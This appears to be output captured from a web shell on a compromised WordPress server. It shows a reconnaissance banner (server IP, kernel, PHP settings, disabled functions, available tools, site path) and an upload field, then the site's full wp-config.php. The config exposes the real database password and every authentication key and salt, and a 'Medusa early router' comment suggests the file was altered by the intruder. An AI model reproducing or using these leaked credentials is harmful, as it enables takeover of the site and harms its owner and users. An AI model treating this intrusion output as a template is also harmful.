| Server IP : 47.82.179.145 / Your IP : 216.73.216.72 Web Server : nginx/1.26.3 System : Linux iZt4n9czhka2zvqfajdlr2Z 6.8.0-63-generic #66-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 13 20:25:30 UTC 2025 x86_64 User : www ( 1001) PHP Version : 8.3.30 Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /www/wwwroot/scuipturepactory.com/ |
Upload File : |
<?php
define('WP_CACHE', true); // Medusa early router
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'scuipturepactory' );
/** Database username */
define( 'DB_USER', 'scuipturepactory' );
/** Database password */
define( 'DB_PASSWORD', '2eE3FTsnew' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'OvsQK1MLWL}Ex/UZ][fvr1bG6wHr-icqq=TY(}?I?{s(_yJG|t]iW9n(T~Tw]OK[' );
define( 'SECURE_AUTH_KEY', '!hY2<#R7MS7n9i)il|q.AvcIt/>Zpg}W{,tO%ArlZZ5y5c&A.a/M]@v2!,EmSMNI' );
define( 'LOGGED_IN_KEY', '/OEpIwwx(.4)/P2p$_)<]%P^fX=c~?+X3i:fS-)gZO.Q1E5swZf>3+r>Meq^&Nq^' );
define( 'NONCE_KEY', ' i&`mE@txZ~;s!^f2D038HMoi2J`ulf!]U$xrM=@s^&;)~%TK=n1)M7<2N.?5Bdg' );
define( 'AUTH_SALT', ')Mc:wiWeT}hIj.o^IFK(YP$3;*V4xYK-^p[5!oaHg(T5u~p:bjW8I9W)7v7$d~:3' );
define( 'SECURE_AUTH_SALT', 'T[+4%9~~hiOt},`}ZecM)ax3&cB*;L_S-7@U]iH>+j+@>j:>/-IMoW5:`zw4}Q^G' );
define( 'LOGGED_IN_SALT', '@&jTmvH(hK7Q?QU}-==_H3_-4uJ$JCsZ`;-:tr,NWA/HeCnXf_j2sJi,8RrlwrT*' );
define( 'NONCE_SALT', '9cG|gX3WrC^QaViVZQo;o_]{&hscR`}Tf[UayQTdcis4=Y/&>^4^F/6XwU>W{0S<' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';